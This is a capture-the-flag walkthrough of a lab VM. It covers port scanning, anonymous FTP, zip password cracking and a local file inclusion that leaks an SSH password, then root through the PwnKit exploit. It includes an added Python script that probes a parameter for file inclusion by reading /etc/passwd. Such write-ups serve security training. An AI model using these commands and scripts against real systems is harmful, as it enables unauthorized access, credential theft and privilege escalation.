
HMV-Driftingblues

HMV-Driftingblues box walkthrough and review

Port scan / information gathering

┌──(root㉿kakeru)-[~/tmp]
└─# nmap -A 192.168.58.44
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-08 21:02 CST
Nmap scan report for bogon (192.168.58.44)
Host is up (0.026s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.58.11
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx 1 0 0 471 Sep 19 2021 respectmydrip.zip [NSE: writeable]
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 9e:bb:af:6f:7d:a7:9d:65:a1:b1:a1:be:91:cd:04:28 (RSA)
| 256 a3:d3:c0:b4:c5:f9:c0:6c:e5:47:64:fe:91:c5:cd:c0 (ECDSA)
|_ 256 4c:84:da:5a:ff:04:b9:b5:5c:5a:be:21:b6:0e:45:73 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-robots.txt: 2 disallowed entries
|_/dripisreal.txt /etc/dripispowerful.html
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: C8:21:58:16:CF:C4 (Intel Corporate)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 26.10 ms bogon (192.168.58.44)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.22 seconds

Ports 21, 22 and 80 are open. nmap also reports that anonymous FTP is allowed and that the single file on the share is world-writable, so start with an anonymous login on port 21.

┌──(root㉿kakeru)-[~/tmp]
└─# ftp anonymous@192.168.58.44

ftp> ls -al
229 Entering Extended Passive Mode (|||27551|)
150 Here comes the directory listing.
drwxr-xr-x 2 0 0 4096 Sep 19 2021 .
drwxr-xr-x 2 0 0 4096 Sep 19 2021 ..
-rwxrwxrwx 1 0 0 471 Sep 19 2021 respectmydrip.zip
ftp> get respectmydrip.zip
local: respectmydrip.zip remote: respectmydrip.zip
229 Entering Extended Passive Mode (|||54209|)
150 Opening BINARY mode data connection for respectmydrip.zip (471 bytes).
100% |***********************************************************************************************************| 471 2.46 MiB/s 00:00 ETA
226 Transfer complete.
471 bytes received in 00:00 (27.75 KiB/s)

There is a zip file; pull it down locally and take a look. If it is password-protected, crack it with john.

┌──(root㉿kakeru)-[~/tmp]
└─# unzip respectmydrip.zip
Archive: respectmydrip.zip
[respectmydrip.zip] respectmydrip.txt password:
skipping: respectmydrip.txt incorrect password
inflating: secret.zip

┌──(root㉿kakeru)-[~/tmp]
└─# zip2john respectmydrip.zip > hash
ver 2.0 respectmydrip.zip/respectmydrip.txt PKZIP Encr: cmplen=32, decmplen=20, crc=5C92F12B ts=96AB cs=5c92 type=0
ver 2.0 respectmydrip.zip/secret.zip is not encrypted, or stored with non-handled compression type

┌──(root㉿kakeru)-[~/tmp]
└─# john hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
Proceeding with incremental:ASCII
072528035 (respectmydrip.zip/respectmydrip.txt)
1g 0:00:01:44 DONE 3/3 (2025-03-08 21:09) 0.009575g/s 33407Kp/s 33407Kc/s 33407KC/s 072238647..078169144
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
┌──(root㉿kakeru)-[~/tmp]
└─# unzip respectmydrip.zip
Archive: respectmydrip.zip
[respectmydrip.zip] respectmydrip.txt password:
extracting: respectmydrip.txt
replace secret.zip? [y]es, [n]o, [A]ll, [N]one, [r]ename: y
inflating: secret.zip

┌──(root㉿kakeru)-[~/tmp]
└─# cat respectmydrip.txt
just focus on "drip"

The text gives the hint "drip". The inner secret.zip is password-protected too, and "drip" is not its password.

Web enumeration

┌──(root㉿kakeru)-[~/tmp]
└─# curl http://192.168.58.44/
<html>
<body>
driftingblues is hacked again so it's now called drippingblues. :D hahaha
<br>
by
<br>
travisscott & thugger
</body>
</html>

robots.txt lists two disallowed entries:

┌──(root㉿kakeru)-[~/tmp]
└─# curl 192.168.58.44/robots.txt
User-agent: *
Disallow: /dripisreal.txt
Disallow: /etc/dripispowerful.html
┌──(root㉿kakeru)-[~/tmp]
└─# curl 192.168.58.44//dripisreal.txt
hello dear hacker wannabe,

go for this lyrics:

https://www.azlyrics.com/lyrics/youngthug/constantlyhating.html

count the n words and put them side by side then md5sum it

ie, hellohellohellohello >> md5sum hellohellohellohello

it's the password of ssh

Taken literally, the hint says to pull out every word in the lyrics that contains an n, string them together and md5sum the result. When I tried grep "n" the number of matching words was alarming, so I set this aside and looked for other information first.
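The recipe in dripisreal.txt is ambiguous: does "n word" mean contains an n or starts with one, does case matter, do repeated words count once? That ambiguity, not the word count, is what makes a raw grep unmanageable. The added example below (not code from the original post) turns each reading of the hint into one candidate hash, so the handful of resulting values can be tried against SSH instead of committing to a single guess. The lyrics embedded in it are constructed placeholder text, not the real song from the URL, and the writeup itself later concludes this route is a red herring.

```python
"""Turn the dripisreal.txt hint into a small SSH password candidate list.

Added example, not from the original writeup. Every plausible reading of
"count the n words and put them side by side then md5sum it" is hashed, so
the result is a short wordlist rather than one guess.
"""
import hashlib
import re

# Constructed sample text; the real lyrics linked from the hint are not reproduced here.
SAMPLE_LYRICS = """Nobody can stop the drip
admin keeps winning, Nobody cares
"""

WORD_RE = re.compile(r"[A-Za-z']+")


def words(text):
    """Tokenise lyrics into words, dropping punctuation and digits."""
    return WORD_RE.findall(text)


def n_words(text, mode="contains", ignore_case=True, dedupe=False):
    """Return the words the hint calls 'n words', under one reading of the hint.

    mode: 'contains' -> the word has the letter n anywhere
          'starts'   -> the word begins with n
    """
    out = []
    seen = set()
    for w in words(text):
        probe = w.lower() if ignore_case else w
        hit = ("n" in probe) if mode == "contains" else probe.startswith("n")
        if not hit:
            continue
        if dedupe:
            if probe in seen:
                continue
            seen.add(probe)
        out.append(w)
    return out


def md5_hex(s):
    """md5sum of the string without a trailing newline (echo -n style)."""
    return hashlib.md5(s.encode()).hexdigest()


def candidates(text):
    """Map each reading of the hint to (joined string, md5 hex) so every variant can be tried."""
    result = {}
    for mode in ("contains", "starts"):
        for ignore_case in (True, False):
            for dedupe in (False, True):
                for lower in (False, True):
                    ws = n_words(text, mode, ignore_case, dedupe)
                    joined = "".join(w.lower() if lower else w for w in ws)
                    key = "/".join([
                        mode,
                        "ci" if ignore_case else "cs",
                        "uniq" if dedupe else "all",
                        "lower" if lower else "asis",
                    ])
                    result[key] = (joined, md5_hex(joined))
    return result


if __name__ == "__main__":
    # One line per candidate: paste the hashes into a wordlist for ssh/hydra.
    for key, (joined, digest) in sorted(candidates(SAMPLE_LYRICS).items()):
        print(f"{digest}  {key}  ({len(joined)} chars)")
```

Note that `md5sum hellohellohellohello` as written in the hint hashes a file name, not a string; `echo -n hellohellohellohello | md5sum` is the intended operation, and the trailing newline that plain `echo` adds would change the digest, which is one more variant worth keeping in mind.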
A gobuster directory scan shows the home page is index.php:

┌──(root㉿kakeru)-[~/tmp]
└─# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -u 192.168.58.44 -x php,js,txt,jpg,png
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.58.44
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,js,txt,jpg,png
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 278]
/index.php (Status: 200) [Size: 138]
/robots.txt (Status: 200) [Size: 78]
/.php (Status: 403) [Size: 278]

Could this PHP file take a hidden parameter? Fuzzing parameter names with wfuzz turned up nothing, but the text pulled from FTP said to just focus on "drip", so I tried drip as the parameter name. Feeding it commands and bare file names returned nothing, though.

Stuck, I checked a writeup: the parameter is meant to read the file named in robots.txt. /etc/dripispowerful.html looks like a filesystem path rather than a URL path, and passing it as the value of drip makes index.php read and echo that local file ahead of the normal page body, a local file inclusion. That is why commands sent through the parameter produced nothing.

view-source:http://192.168.58.44/index.php?drip=/etc/dripispowerful.html

<!DOCTYPE html>
<html>
<body>
<style>
body {
background-image: url('drippin.jpg');
background-repeat: no-repeat;
}

@font-face {
font-family: Segoe;
src: url('segoeui.ttf');
}

.mainfo {
text-align: center;
border: 1px solid #000000;
font-family: 'Segoe';
padding: 5px;
background-color: #ffffff;
margin-top: 300px;
}

.emoji {
width: 32px;
}
</style>
password is:
imdrippinbiatch
</body>
</html>

<html>
<body>
driftingblues is hacked again so it's now called drippingblues. :D hahaha
<br>
by
<br>
travisscott & thugger
</body>
</html>
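The include behaviour shown above is easier to confirm systematically than by guessing values for drip. The added example below (not code from the original post or from the box) assumes only what the page shows: that index.php?drip=<path> echoes a local file before the usual index body. It includes files whose contents are recognisable, such as /etc/passwd, and judges success by diffing each response against the baseline page rather than by eyeballing it. The fetcher is injectable so the logic can run offline against constructed responses; the marker strings and probe list are my assumptions.

```python
"""Probe index.php?drip=<path> for local file inclusion.

Added example, not part of the original writeup. Assumes the behaviour the
page shows: the included file is echoed, then the normal index.php body.
"""
from urllib.parse import parse_qs, urlencode, urlsplit
from urllib.request import urlopen

BASE_URL = "http://192.168.58.44/index.php"   # target from the writeup
PARAM = "drip"

# Files worth including, each paired with a marker we expect if the include worked.
# Assumed probe list; extend it with whatever the target is likely to have.
PROBES = [
    ("/etc/passwd", "root:x:0:0"),                 # proves arbitrary file read
    ("/etc/dripispowerful.html", "password is:"),  # path hinted by robots.txt
    ("/etc/hosts", "localhost"),
]


def http_fetch(url, timeout=10):
    """Real fetcher: GET the URL and return the body as text."""
    with urlopen(url, timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")


def build_url(path, base_url=BASE_URL, param=PARAM):
    """URL-encode the path as the parameter value (slashes become %2F)."""
    query = urlencode({param: path})
    return f"{base_url}?{query}"


def param_from_url(url, param=PARAM):
    """Inverse of build_url; returns None when the parameter is absent."""
    return parse_qs(urlsplit(url).query).get(param, [None])[0]


def extract_included(response, baseline):
    """Return the part of the response that is not the normal page, or '' if nothing was added.

    The page shows the include output followed by the untouched index.php body,
    so stripping the baseline suffix isolates the included file.
    """
    if response == baseline:
        return ""
    if response.endswith(baseline):
        return response[: -len(baseline)]
    return response  # page changed shape entirely; return everything for inspection


def probe_lfi(fetch, base_url=BASE_URL, param=PARAM, probes=PROBES):
    """Try each probe file and report which ones were included.

    A probe counts as included only when the response differs from the
    baseline AND the expected marker appears in the added content.
    """
    baseline = fetch(base_url)
    results = {}
    for path, marker in probes:
        body = fetch(build_url(path, base_url, param))
        included = extract_included(body, baseline)
        results[path] = {
            "included": bool(included) and marker in included,
            "content": included,
        }
    return results


if __name__ == "__main__":
    for path, r in probe_lfi(http_fetch).items():
        status = "INCLUDED" if r["included"] else "no change"
        print(f"{status:10} {path}")
        if r["included"]:
            print(r["content"].strip())
```

The baseline comparison is the important part: gobuster reported index.php at 138 bytes, so any response noticeably larger than that for a drip value is a sign the include fired even when the included file is not recognisable on sight.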

That gives the password imdrippinbiatch. After trying a few usernames (the index page names travisscott and thugger), I got an SSH login as thugger.

Privilege escalation

thugger@drippingblues:~$ ls -al
total 64
drwxr-xr-x 14 thugger thugger 4096 Sep 19 2021 .
drwxr-xr-x 3 root root 4096 Sep 18 2021 ..
-rw------- 1 thugger thugger 8 Sep 19 2021 .bash_history
drwxr-xr-x 10 thugger thugger 4096 Sep 19 2021 .cache
drwxr-xr-x 11 thugger thugger 4096 Sep 19 2021 .config
drwxr-xr-x 2 thugger thugger 4096 Sep 18 2021 Desktop
drwxr-xr-x 2 thugger thugger 4096 Sep 18 2021 Documents
drwxr-xr-x 2 thugger thugger 4096 Sep 18 2021 Downloads
drwxr-xr-x 3 thugger thugger 4096 Sep 19 2021 .local
drwxr-xr-x 2 thugger thugger 4096 Sep 18 2021 Music
drwxr-xr-x 2 thugger thugger 4096 Sep 18 2021 Pictures
drwxr-xr-x 2 thugger thugger 4096 Sep 18 2021 Public
drwx------ 2 thugger thugger 4096 Sep 19 2021 .ssh
drwxr-xr-x 2 thugger thugger 4096 Sep 18 2021 Templates
-r-x------ 1 thugger thugger 32 Sep 19 2021 user.txt
drwxr-xr-x 2 thugger thugger 4096 Sep 18 2021 Videos

Apart from user.txt, everything in this user's home directory is an empty folder, and there is no sudo access either.
A linpeas.sh scan turned up:

-rwsr-xr-x 1 root root             31K Aug 16  2019 /usr/bin/pkexec  --->  Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)
-rwsr-xr-x 1 root root 146K Jan 19 2021 /snap/core18/2128/usr/bin/sudo

Two suspicious SUID binaries. I tried the exploit linpeas flags next to pkexec (CVE-2019-13272) and it did not work.

Uploading linux-exploit-suggester.sh and scanning for likely vulnerabilities flagged PwnKit:

[+] [CVE-2021-4034] PwnKit

Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
Exposure: probable
Tags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21 ],debian=7|8|9|10|11,fedora,manjaro
Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main

A Python version of the exploit from GitHub can be used directly, since the target has python3:

thugger@drippingblues:~$ vi pwn.py
thugger@drippingblues:~$ python3 pwn.py
[+] Creating shared library for exploit code.
[-] GCONV_PATH=. directory already exists, continuing.
[+] Calling execve()
# id
uid=0(root) gid=1001(thugger) groups=1001(thugger)

Note the result: the uid is 0 but the gid is still thugger's, which is expected because pkexec is setuid root and not setgid. The "GCONV_PATH=. directory already exists" line means an earlier run left its working directory behind; clean that up (along with anything else the script drops) when you are done. There are plenty of other routes to root here as well: I also tried CVE-2021-3156 (Baron Samedit, the sudo heap overflow) on a whim and it worked too, and GitHub has a Python script for that one as well.

Summary

  • Information found early needs to be sifted: this box has red herrings such as secret.zip and the fake SSH-password recipe, while I did not make full use of what robots.txt gave away.
  • Picked up a new tool, linux-exploit-suggester.sh, for finding candidate vulnerabilities.
  • Python exploits are preferable because they can run directly on the target.